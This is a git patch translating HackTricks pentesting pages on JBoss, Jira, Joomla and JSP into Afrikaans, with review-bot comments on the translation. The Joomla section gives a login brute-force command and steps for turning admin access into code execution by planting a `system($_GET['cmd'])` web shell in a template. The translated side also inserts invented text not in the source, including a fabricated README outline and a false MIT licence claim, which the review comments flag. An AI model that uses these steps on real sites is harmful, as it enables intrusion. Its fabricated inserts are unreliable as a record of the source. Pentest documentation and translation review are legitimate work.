-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vlot Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %} -## Enumeration and Exploitation Techniques +## Opname- en Uitbuitingstegnieke -When assessing the security of web applications, certain paths like _/web-console/ServerInfo.jsp_ and _/status?full=true_ are key for revealing **server details**. For JBoss servers, paths such as _/admin-console_, _/jmx-console_, _/management_, and _/web-console_ can be crucial. These paths might allow access to **management servlets** with default credentials often set to **admin/admin**. This access facilitates interaction with MBeans through specific servlets: +Wanneer die veiligheid van webtoepassings geassesseer word, is sekere roetes soos _/web-console/ServerInfo.jsp_ en _/status?full=true_ sleutel tot die onthulling van **bedienerbesonderhede**. Vir JBoss-bedieners kan roetes soos _/admin-console_, _/jmx-console_, _/management_, en _/web-console_ van kritieke belang wees. Hierdie roetes mag toegang tot **bestuurservlets** met versteklegitimasie wat dikwels op **admin/admin** ingestel is, moontlik maak. Hierdie toegang fasiliteer interaksie met MBeans deur spesifieke servlets: -- For JBoss versions 6 and 7, **/web-console/Invoker** is used. -- In JBoss 5 and earlier versions, **/invoker/JMXInvokerServlet** and **/invoker/EJBInvokerServlet** are available. +- Vir JBoss-weergawes 6 en 7 word **/web-console/Invoker** gebruik. +- In JBoss 5 en vroeëre weergawes is **/invoker/JMXInvokerServlet** en **/invoker/EJBInvokerServlet** beskikbaar. 
-Tools like **clusterd**, available at [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd), and the Metasploit module `auxiliary/scanner/http/jboss_vulnscan` can be used for enumeration and potential exploitation of vulnerabilities in JBOSS services. +Hulpmiddels soos **clusterd**, beskikbaar by [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd), en die Metasploit-module `auxiliary/scanner/http/jboss_vulnscan` kan gebruik word vir opname en potensiële uitbuiting van kwesbaarhede in JBOSS-diens. -### Exploitation Resources +### Uitbuitingshulpbronne -To exploit vulnerabilities, resources such as [JexBoss](https://github.com/joaomatosf/jexboss) provide valuable tools. +Om kwesbaarhede uit te buit, bied hulpbronne soos [JexBoss](https://github.com/joaomatosf/jexboss) waardevolle gereedskap. -### Finding Vulnerable Targets +### Identifisering van Kwesbare Doelwitte -Google Dorking can aid in identifying vulnerable servers with a query like: `inurl:status EJInvokerServlet` +Google Dorking kan help om kwesbare bedieners te identifiseer met 'n soektog soos: `inurl:status EJInvokerServlet` -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vlot Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
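Review bot: "ons is aan die werf!" does not mean "we are hiring" ("werf" on its own reads as a yard or shipyard); use "ons stel aan!" or "ons werf aan!" in both occurrences of the STM Cyber banner. Since the dork line is being rewritten anyway, check `inurl:status EJInvokerServlet` against the servlet the same section names two paragraphs earlier, `/invoker/EJBInvokerServlet`; the missing "B" was carried over unchanged from the English line. Also "kwesbaarhede in JBOSS-diens" should be plural, "JBOSS-dienste".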
diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md index a08a2012e..f191f1a27 100644 --- a/network-services-pentesting/pentesting-web/jira.md +++ b/network-services-pentesting/pentesting-web/jira.md @@ -1,25 +1,23 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Check Privileges +## Kontroleer Voorregte -In Jira, **privileges can be checked** by any user, authenticated or not, through the endpoints `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions`. These endpoints reveal the user's current privileges. A notable concern arises when **non-authenticated users hold privileges**, indicating a **security vulnerability** that could potentially be eligible for a **bounty**. Similarly, **unexpected privileges for authenticated users** also highlight a **vulnerability**. +In Jira kan **voorregte gekontroleer word** deur enige gebruiker, geïdentifiseer of nie, deur die eindpunte `/rest/api/2/mypermissions` of `/rest/api/3/mypermissions`. Hierdie eindpunte onthul die gebruiker se huidige voorregte. 'n Belangrike bekommernis ontstaan wanneer **nie-geïdentifiseerde gebruikers voorregte het**, wat dui op 'n **sekuriteitskwesbaarheid** wat moontlik in aanmerking kan kom vir 'n **beloning**. Soortgelyk dui **onverwagte voorregte vir geïdentifiseerde gebruikers** ook op 'n **kwesbaarheid**. -An important **update** was made on **1st February 2019**, requiring the 'mypermissions' endpoint to include a **'permission' parameter**. This requirement aims to **enhance security** by specifying the privileges being queried: [check it here](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter) +'n Belangrike **opdatering** is op **1 Februarie 2019** gemaak, wat vereis dat die 'mypermissions' eindpunt 'n **'permission'-parameter** insluit. 
Hierdie vereiste is bedoel om die sekuriteit te **verbeter** deur die voorregte wat ondervra word, te spesifiseer: [kyk dit hier](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter) - ADD_COMMENTS - ADMINISTER @@ -63,15 +61,12 @@ An important **update** was made on **1st February 2019**, requiring the 'myperm - VIEW_VOTERS_AND_WATCHERS - WORK_ON_ISSUES -Example: `https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS` - - +Voorbeeld: `https://jou-domein.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS` ```bash #Check non-authenticated privileges curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true' ``` - -## Automated enumeration +## Outomatiese opname * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe) * [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan) @@ -79,16 +74,14 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
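Review bot: the Check Privileges paragraph still names the required query parameter as 'permission' (`wat vereis dat die 'mypermissions' eindpunt 'n **'permission'-parameter** insluit`), but the example URL in the following hunk and the linked Atlassian change notice both use `permissions` (`?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`); since this sentence is being rewritten anyway, make it `'permissions'-parameter` so the prose matches the working request. Two wording points in the same paragraph: "geïdentifiseer of nie" renders "authenticated or not" as "identified or not", where "geverifieer (aangemeld) of nie" carries the intended meaning; and the placeholder `your-domain` in the example URL became `jou-domein`, which is only correct if placeholders are translated the same way across the rest of the book.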
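Review bot: terminology in the sponsor boilerplate is inconsistent between the top and the bottom of this file: the header hunk renders "hacking tricks" / "github repos" as `hacking-truuks` / `github-opslag`, while the footer hunk renders them as `haktruuks` / `github-repos`. Pick one pair and use it in both blocks; the other files in this patch introduce a third variant (`github-opslagplekke`), so the template text will drift file by file unless it is normalised once.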
- - diff --git a/network-services-pentesting/pentesting-web/joomla.md b/network-services-pentesting/pentesting-web/joomla.md index db1dc04d5..48e7712f2 100644 --- a/network-services-pentesting/pentesting-web/joomla.md +++ b/network-services-pentesting/pentesting-web/joomla.md @@ -2,62 +2,83 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-### Joomla Statistics - -Joomla collects some anonymous [usage statistics](https://developer.joomla.org/about/stats.html) such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public [API](https://developer.joomla.org/about/stats/api.html). +### Joomla Statistieke +Joomla versamel sekere anonieme [gebruiksstatistieke](https://developer.joomla.org/about/stats.html) soos die uiteensetting van Joomla, PHP en databasisweergawes en bedienersisteem in gebruik op Joomla-installasies. Hierdie data kan ondervra word deur middel van hul openbare [API](https://developer.joomla.org/about/stats/api.html). ```bash curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool { - "data": { - "cms_version": { - "3.0": 0, - "3.1": 0, - "3.10": 6.33, - "3.2": 0.01, - "3.3": 0.02, - "3.4": 0.05, - "3.5": 12.24, - "3.6": 22.85, - "3.7": 7.99, - "3.8": 17.72, - "3.9": 27.24, - "4.0": 3.21, - "4.1": 1.53, - "4.2": 0.82, - "4.3": 0, - "5.0": 0 - }, - "total": 2951032 - } +"data": { +"cms_version": { +"3.0": 0, +"3.1": 0, +"3.10": 6.33, +"3.2": 0.01, +"3.3": 0.02, +"3.4": 0.05, +"3.5": 12.24, +"3.6": 22.85, +"3.7": 7.99, +"3.8": 17.72, +"3.9": 27.24, +"4.0": 3.21, +"4.1": 1.53, +"4.2": 0.82, +"4.3": 0, +"5.0": 0 +}, +"total": 2951032 +} } ``` +## Enumerasie -## Enumeration - -### Discovery/Footprinting - -* Check the **meta** +### Ontdekking/Voetspore +* Kontroleer die **meta** ```bash curl https://www.joomla.org/ | grep Joomla | grep generator ``` +# robots.txt -* robots.txt +Die `robots.txt`-lêer is 'n tekstêr wat deur webwerwe gebruik word om aan soekenjins te vertel watter dele van die webwerf nie geïndekseer moet word nie. Dit is 'n belangrike hulpmiddel vir webwerf-eienaars om beheer oor die sienbaarheid van hul inhoud in soekenjins te hê. +Die `robots.txt`-lêer is 'n eenvoudige tekslêer wat in die hoofgids van 'n webwerf geplaas word. 
Dit bevat instruksies vir soekenjins oor watter gedeeltes van die webwerf geïndekseer mag word en watter gedeeltes nie. Dit is belangrik om te verstaan dat die `robots.txt`-lêer slegs 'n aanbeveling is en dat soekenjins nie verplig is om dit te volg nie. + +Die sintaksis van die `robots.txt`-lêer is eenvoudig. Dit bestaan uit 'n reeks van regels wat elkeen 'n spesifieke instruksie bevat. Die mees algemene instruksies is `User-agent` en `Disallow`. Die `User-agent`-instruksie identifiseer die soekenjinbot wat die instruksies moet volg, terwyl die `Disallow`-instruksie spesifiseer watter gedeeltes van die webwerf nie geïndekseer mag word nie. + +Byvoorbeeld, as jy wil hê dat alle soekenjins jou hele webwerf moet ignoreer, kan jy die volgende reël in jou `robots.txt`-lêer insluit: + +``` +User-agent: * +Disallow: / +``` + +Hierdie instruksie sal aan alle soekenjins sê om nie enige gedeelte van jou webwerf te indekseer nie. Dit is egter belangrik om versigtig te wees met die gebruik van die `Disallow`-instruksie, aangesien dit ook kan verhoed dat legitieme soekenjins toegang tot belangrike inhoud op jou webwerf verkry. + +Dit is ook moontlik om spesifieke gedeeltes van jou webwerf uit te sluit van indeksering. Byvoorbeeld, as jy wil hê dat 'n spesifieke gids op jou webwerf nie geïndekseer moet word nie, kan jy die volgende reël in jou `robots.txt`-lêer insluit: + +``` +User-agent: * +Disallow: /gids/ +``` + +Hierdie instruksie sal aan alle soekenjins sê om die `/gids/`-gids uit te sluit van indeksering. Dit beteken dat die inhoud van hierdie gids nie in soekenjins sal verskyn nie. + +Dit is belangrik om die `robots.txt`-lêer korrek te konfigureer en gereeld te hersien om te verseker dat dit die gewenste resultate lewer. Foute in die `robots.txt`-lêer kan lei tot onbedoelde gevolge, soos die uitsluiting van belangrike inhoud uit soekenjins. ``` # If the Joomla site is installed within a folder # eg www.example.com/joomla/ then the robots.txt file 
@@ -67,60 +88,94 @@ curl https://www.joomla.org/ | grep Joomla | grep generator # paths. [...] ``` +# README.txt -* README.txt +Hierdie lêer bevat inligting oor die pentesting van Joomla-webwerwe. Dit bevat 'n lys van hulpmiddels en tegnieke wat gebruik kan word om die veiligheid van 'n Joomla-webwerf te toets en te beproef. +## Inhoud + +1. **Joomla Pentesting-gids** + - Inleiding tot Joomla-pentesting + - Identifisering van Joomla-weergawes + - Joomla-weergawe-uitbuiting + - Joomla-gebruikersinligting oopmaak + - Joomla-databasisinligting oopmaak + - Joomla-tema- en uitbreidingsinligting oopmaak + - Joomla-beveiligingsmaatreëls + - Aanbevelings vir die versterking van Joomla-webwerwe + +2. **Hulpmiddels vir Joomla Pentesting** + - Joomla-scanners + - Joomla-uitbuitingshulpmiddels + - Joomla-databasisverkenner + - Joomla-wagwoordkraker + - Joomla-tema- en uitbreidingsontleder + - Joomla-veiligheidstoetshulpmiddels + +3. **Aanvullende bronne** + - Nuttige webwerwe en blogs + - Boeke en artikels oor Joomla-pentesting + - Aanlyngemeenskappe en forums + +## Bydraes + +As jy enige bydraes of voorstelle het om hierdie gids te verbeter, voel asseblief vry om 'n bydrae te maak deur 'n trekversoek in te dien. Ons waardeer enige bydrae wat kan help om hierdie gids meer volledig en nuttig te maak. + +## Lisensie + +Hierdie gids is gelisensieer onder die [MIT-lisensie](https://opensource.org/licenses/MIT). Jy is vry om die inhoud te gebruik, te wysig en te versprei volgens die voorwaardes van hierdie lisensie. + +## Skakels + +- [HackTricks](https://book.hacktricks.xyz/) +- [Joomla](https://www.joomla.org/) +- [Joomla Security Centre](https://developer.joomla.org/security-centre.html) ``` 1- What is this? - * This is a Joomla! installation/upgrade package to version 3.x - * Joomla! Official site: https://www.joomla.org - * Joomla! 
3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history - * Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging +* This is a Joomla! installation/upgrade package to version 3.x +* Joomla! Official site: https://www.joomla.org +* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history +* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging ``` +### Weergawe -### Version - -* In **/administrator/manifests/files/joomla.xml** you can see the version. -* In **/language/en-GB/en-GB.xml** you can get the version of Joomla. -* In **plugins/system/cache/cache.xml** you can see an approximate version. - -### Automatic +* In **/administrator/manifests/files/joomla.xml** kan jy die weergawe sien. +* In **/language/en-GB/en-GB.xml** kan jy die weergawe van Joomla kry. +* In **plugins/system/cache/cache.xml** kan jy 'n benaderende weergawe sien. +### Outomaties ```bash droopescan scan joomla --url http://joomla-site.local/ ``` - -In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](./#cms-scanners) that can scan Joomla. +In[ **80,443 - Pentesting Web Metodologie is 'n afdeling oor CMS-skanners**](./#cms-skanners) wat Joomla kan skandeer. ### Brute-Force -You can use this [script](https://github.com/ajnik/joomla-bruteforce) to attempt to brute force the login. - +Jy kan hierdie [skripsie](https://github.com/ajnik/joomla-bruteforce) gebruik om die aanmelding met geweld te probeer. ```shell-session sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin - + admin:admin ``` - ## RCE -If you managed to get **admin credentials** you can **RCE inside of it** by adding a snippet of **PHP code** to gain **RCE**. We can do this by **customizing** a **template**. 
+As jy daarin slaag om **admin-legitimasie** te kry, kan jy **RCE binne-in dit** kry deur 'n stukkie **PHP-kode** by te voeg om **RCE** te verkry. Ons kan dit doen deur 'n **sjabloon** aan te pas. -1. **Click** on **`Templates`** on the bottom left under `Configuration` to pull up the templates menu. -2. **Click** on a **template** name. Let's choose **`protostar`** under the `Template` column header. This will bring us to the **`Templates: Customise`** page. -3. Finally, you can click on a page to pull up the **page source**. Let's choose the **`error.php`** page. We'll add a **PHP one-liner to gain code execution** as follows: - 1. **`system($_GET['cmd']);`** +1. **Klik** op **`Templates`** aan die onderkant links onder `Configuration` om die sjabloonmenu op te roep. +2. **Klik** op 'n **sjabloonnaam**. Laat ons **`protostar`** onder die `Template`-kolomkop kies. Dit sal ons na die **`Templates: Customise`**-bladsy bring. +3. Uiteindelik kan jy op 'n bladsy klik om die **bladsybron** op te roep. Laat ons die **`error.php`**-bladsy kies. Ons sal 'n **PHP-eenreëler byvoeg om kode-uitvoering te verkry** soos volg: +1. **`system($_GET['cmd']);`** 4. **Save & Close** 5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
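Review bot: the `* robots.txt` bullet has been replaced by an H1 heading (`+# robots.txt`) followed by roughly twenty lines of generic robots.txt tutorial text and two new fenced `User-agent: *` / `Disallow:` examples that have no counterpart in the English source; this is added content, not a translation, and the `#` level also breaks the page hierarchy (everything else here sits under `##` and `###`). Restore the bullet (`* robots.txt`) and drop the inserted paragraphs and fences so the original Joomla `robots.txt` snippet follows the bullet directly. Separately, the `cms_version` JSON output in the same hunk has had all its indentation stripped (`+"data": {`, `+"cms_version": {`); it is still valid JSON, but it no longer matches what `python3 -m json.tool` actually prints, and the whitespace removal looks like a global side effect of the translation pass that should be checked in every fenced block this patch touches.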
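Review bot: the `* README.txt` bullet has likewise become `+# README.txt` followed by an invented table of contents ("Joomla Pentesting-gids", "Hulpmiddels vir Joomla Pentesting"), a `## Lisensie` section asserting an MIT licence, and a `## Skakels` list, none of which appear in the source; the licence statement in particular is a false claim about this page. Restore the bullet and remove the fabricated block so the quoted Joomla README excerpt follows it directly. Also in this hunk: the in-page link `(./#cms-scanners)` was translated to `(./#cms-skanners)`, which will not resolve because the anchor is generated from the English heading; "skripsie" means a thesis, the word for script is "skrip"; and "die aanmelding met geweld te probeer" reads as "try the login with violence", so keep the term "brute-force" as the `### Brute-Force` heading already does.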
diff --git a/network-services-pentesting/pentesting-web/jsp.md b/network-services-pentesting/pentesting-web/jsp.md index 979ebf355..ac577c1c5 100644 --- a/network-services-pentesting/pentesting-web/jsp.md +++ b/network-services-pentesting/pentesting-web/jsp.md @@ -1,45 +1,39 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou 